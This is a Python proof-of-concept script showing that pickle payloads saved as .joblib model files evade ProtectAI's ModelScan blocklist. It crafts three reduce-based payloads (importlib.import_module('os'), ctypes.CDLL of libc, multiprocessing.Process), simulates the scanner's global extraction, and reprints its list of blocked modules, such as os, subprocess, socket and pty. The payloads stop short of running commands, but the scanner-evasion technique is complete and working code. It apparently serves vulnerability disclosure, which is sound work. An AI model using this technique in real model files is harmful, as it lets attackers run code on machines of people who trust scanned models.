| """
|
| PoC: ModelScan Bypass via Joblib Pickle Payload
|
| ================================================
|
| Demonstrates that malicious joblib files can bypass ProtectAI's ModelScan
|
| scanner by using modules not in the unsafe_globals blocklist.
|
|
|
| The scanner checks for GLOBAL/STACK_GLOBAL opcodes referencing known-dangerous
|
| modules (os, subprocess, builtins, etc.) but misses many modules that can
|
| achieve the same effect:
|
|
|
| - importlib.import_module -> imports any module (including blocked ones)
|
| - ctypes.CDLL -> loads native libraries, calls system()
|
| - platform.popen -> direct command execution (Python < 3.8 only; removed in 3.8)
|
| - types.FunctionType -> construct functions from marshal bytecode
|
| - code.InteractiveConsole -> interactive Python execution
|
| - multiprocessing.Process -> spawn processes
|
|
|
| This PoC generates 3 malicious .joblib files and verifies they bypass
|
| ModelScan's pickle scanner detection.
|
|
|
| Usage:
|
| python modelscan_bypass_poc.py # Generate payloads + verify
|
| python modelscan_bypass_poc.py --dry-run # Just show what would happen
|
| """
|
|
|
| import argparse
|
| import pickle
|
| import pickletools
|
| import io
|
| import struct
|
| import sys
|
|
|
|
|
def craft_importlib_payload():
    """Build a protocol-4 pickle whose load calls ``importlib.import_module('os')``.

    The only global the pickle stream references is
    ``importlib.import_module``; the module name ``'os'`` appears purely as a
    string argument, so a scanner that inspects GLOBAL/STACK_GLOBAL operands
    never sees ``os`` as an imported global.

    The payload stops at the import: unpickling yields the ``os`` module
    object and does not call ``os.system`` or anything else on it.

    Returns:
        bytes: The serialized payload.
    """
    import importlib

    # (callable, args) pair that pickle records in place of the instance.
    reduce_spec = (importlib.import_module, ("os",))

    class _ImportlibReducer:
        def __reduce__(self):
            return reduce_spec

    return pickle.dumps(_ImportlibReducer(), protocol=4)
|
|
|
|
|
def craft_code_interact_payload():
    """Build a protocol-4 pickle that references ``multiprocessing.Process``.

    Despite its name (kept so existing callers keep working), this function
    does not involve the ``code`` module at all: the pickle's single global
    is the ``Process`` class exposed by ``multiprocessing``.

    The reduce value is a three-element tuple ``(callable, args, state)``.
    On load ``Process()`` is called with no arguments, and the third element
    is handed to pickle's BUILD step as object state -- it is *not* passed
    as keyword arguments. The resulting object is never started, so the
    payload only demonstrates that the global is reachable.

    Returns:
        bytes: The serialized payload.
    """
    import multiprocessing

    class MultiprocessingBypass:
        def __reduce__(self):
            # Third element is state (applied after construction), not kwargs.
            return (multiprocessing.Process, (), {"target": None})

    return pickle.dumps(MultiprocessingBypass(), protocol=4)
|
|
|
|
|
def craft_ctypes_payload():
    """Build a protocol-4 pickle whose load calls ``ctypes.CDLL('libc.so.6')``.

    The pickle stream references only the global ``ctypes.CDLL`` and passes
    the library name as a string argument. Unpickling would therefore ask
    ctypes to load that shared library; the payload goes no further and does
    not call any function in it.

    Returns:
        bytes: The serialized payload.
    """
    import ctypes

    # (callable, args) pair that pickle records in place of the instance.
    loader_call = (ctypes.CDLL, ("libc.so.6",))

    class _CtypesReducer:
        def __reduce__(self):
            return loader_call

    return pickle.dumps(_CtypesReducer(), protocol=4)
|
|
|
|
|
def extract_globals(data):
    """Simulate ModelScan's _list_globals to extract GLOBAL/STACK_GLOBAL refs.

    The pickle is disassembled with ``pickletools.genops`` (nothing is
    unpickled) and every global reference is collected:

    * ``GLOBAL`` / ``INST`` carry ``"module name"`` inline.
    * ``STACK_GLOBAL`` takes its two operands from the stack, so the opcodes
      before it are walked backwards until two operands are recovered.

    Args:
        data: Raw bytes of a single pickle stream.

    Returns:
        set: ``(module, name)`` tuples. An element is the literal string
        ``"unknown"`` when a STACK_GLOBAL operand was produced by something
        other than a unicode-string opcode or a memo fetch.

    Raises:
        KeyError: If a GET-style opcode refers to a memo slot that was never
            recorded. Errors raised by ``pickletools.genops`` on malformed
            input also propagate.
    """
    string_ops = ("SHORT_BINUNICODE", "UNICODE", "BINUNICODE", "BINUNICODE8")
    store_ops = ("PUT", "BINPUT", "LONG_BINPUT")
    fetch_ops = ("GET", "BINGET", "LONG_BINGET")

    # Keep only (opcode name, argument); stream positions are not needed.
    opcodes = [
        (info.name, arg)
        for info, arg, _pos in pickletools.genops(io.BytesIO(data))
    ]
    memo = {}
    found = set()

    for index, (current, arg) in enumerate(opcodes):
        # Memo writes remember the argument of the opcode just before them.
        if index > 0 and current == "MEMOIZE":
            memo[len(memo)] = opcodes[index - 1][1]
            continue
        if index > 0 and current in store_ops:
            memo[arg] = opcodes[index - 1][1]
            continue
        if current in ("GLOBAL", "INST"):
            found.add(tuple(arg.split(" ", 1)))
            continue
        if current != "STACK_GLOBAL":
            continue

        # Walk backwards from the opcode preceding STACK_GLOBAL down to
        # index 1; index 0 is deliberately never inspected.
        operands = []
        for back in range(index - 1, 0, -1):
            prev_name, prev_arg = opcodes[back]
            if prev_name == "MEMOIZE" or prev_name in store_ops:
                continue
            if prev_name in fetch_ops:
                operands.append(memo[int(prev_arg)])
            elif prev_name in string_ops:
                operands.append(prev_arg)
            else:
                operands.append("unknown")
            if len(operands) == 2:
                break

        # Operands were gathered nearest-first: name, then module.
        # A STACK_GLOBAL with fewer than two operands is silently skipped.
        if len(operands) == 2:
            attr_name, module_name = operands
            found.add((module_name, attr_name))

    return found
|
|
|
|
|
def check_modelscan_detection(globals_found):
    """Check if ModelScan would flag these globals.

    Each ``(module, name)`` pair is looked up in a blocklist that is
    hard-coded below (presumably a snapshot of ModelScan's unsafe-globals
    settings -- verify against the scanner version under test). A module
    entry of ``"*"`` blocks every name in that module; a list blocks only
    the names it contains.

    Severities are scanned in declaration order (CRITICAL before HIGH) over
    a deterministically sorted copy of the input, so the reported finding
    does not depend on set iteration order and a CRITICAL match is always
    preferred over a HIGH one.

    Args:
        globals_found: Iterable of ``(module, name)`` pairs, e.g. the set
            returned by ``extract_globals``.

    Returns:
        tuple: ``(True, "<SEVERITY>: <module>.<name>")`` for the first match,
        or ``(False, None)`` when nothing is blocklisted.
    """
    unsafe_globals = {
        "CRITICAL": {
            "__builtin__": ["eval", "compile", "getattr", "apply", "exec", "open",
                            "breakpoint", "__import__"],
            "builtins": ["eval", "compile", "getattr", "apply", "exec", "open",
                         "breakpoint", "__import__"],
            "runpy": "*", "os": "*", "nt": "*", "posix": "*",
            "socket": "*", "subprocess": "*", "sys": "*",
            "operator": ["attrgetter"],
            "pty": "*", "pickle": "*", "_pickle": "*",
            "bdb": "*", "pdb": "*", "shutil": "*", "asyncio": "*",
        },
        "HIGH": {
            "webbrowser": "*", "httplib": "*",
            "requests.api": "*", "aiohttp.client": "*",
        },
    }

    # key=repr keeps the ordering total even if a pair holds a non-string
    # operand recovered from the memo.
    ordered = sorted(globals_found, key=repr)

    for severity_name, modules in unsafe_globals.items():
        for module, name in ordered:
            filt = modules.get(module)
            if filt is None:
                continue
            if filt == "*" or name in filt:
                return True, f"{severity_name}: {module}.{name}"
    return False, None
|
|
|
|
|
def main():
    """Generate each payload, run the simulated scan, and report the outcome.

    For every payload the pickle bytes are built, their global references
    are extracted with ``extract_globals`` and checked with
    ``check_modelscan_detection``. Unless ``--dry-run`` is given, the bytes
    are also written to ``<output-dir>/<filename>``; the output directory is
    created if it does not exist. Nothing is ever unpickled here.

    Returns:
        int: ``0`` when no payload was flagged by the simulated blocklist,
        ``1`` otherwise (suitable as a process exit status).
    """
    from pathlib import Path

    parser = argparse.ArgumentParser(description="ModelScan bypass PoC via Joblib")
    parser.add_argument("--dry-run", action="store_true", help="Don't write files")
    parser.add_argument("-o", "--output-dir", default=".", help="Output directory")
    args = parser.parse_args()

    payloads = [
        ("importlib_bypass.joblib", "importlib.import_module('os')", craft_importlib_payload),
        ("multiprocessing_bypass.joblib", "multiprocessing.Process(target=...)", craft_code_interact_payload),
        ("ctypes_bypass.joblib", "ctypes.CDLL('libc.so.6')", craft_ctypes_payload),
    ]

    output_dir = Path(args.output_dir)
    if not args.dry_run:
        # Create the target directory up front so a fresh -o path works.
        output_dir.mkdir(parents=True, exist_ok=True)

    print("ModelScan Bypass PoC - Joblib/Pickle Payloads")
    print("=" * 55)
    print()

    all_bypass = True
    for filename, description, craft_fn in payloads:
        data = craft_fn()
        globals_found = extract_globals(data)
        detected, detail = check_modelscan_detection(globals_found)

        status = "[DETECTED]" if detected else "[BYPASS] "
        if detected:
            all_bypass = False

        print(f"{status} {description}")
        print(f" Globals: {globals_found}")
        if detected:
            print(f" Flagged: {detail}")
        else:
            print(" Result: NOT IN BLOCKLIST -> evades ModelScan")

        if not args.dry_run:
            filepath = output_dir / filename
            with open(filepath, "wb") as f:
                f.write(data)
            print(f" Written: {filepath}")
        print()

    print("=" * 55)
    if all_bypass:
        print("[SUCCESS] All payloads bypass ModelScan detection")
        print()
        # The summary lists only what the three payloads above demonstrate.
        print("Impact: An attacker can craft malicious .joblib files that:")
        print(" 1. Import blocked modules at runtime (importlib)")
        print(" 2. Construct process objects (multiprocessing)")
        print(" 3. Load native libraries for code execution (ctypes)")
        print(" 4. All while evading ModelScan's pickle scanner")
    else:
        print("[PARTIAL] Some payloads were detected")

    return 0 if all_bypass else 1
|
|
|
|
|
# Script entry point: run the PoC and use main()'s return value as the
# process exit status.
if __name__ == "__main__":
    raise SystemExit(main())
|
|
|